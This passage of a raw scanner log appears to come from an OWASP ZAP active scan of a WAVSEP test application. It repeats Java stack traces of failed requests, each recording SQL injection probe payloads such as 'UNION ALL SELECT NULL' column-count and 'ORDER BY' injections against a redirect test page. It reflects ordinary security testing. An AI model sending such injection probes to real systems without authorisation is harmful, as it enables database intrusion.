org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682501 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682502 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682503 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682503 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682504 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') ORDER BY 6690-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') ORDER BY 6690-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682505 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682506 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682507 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682507 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682508 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682509 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682510 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682511 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due 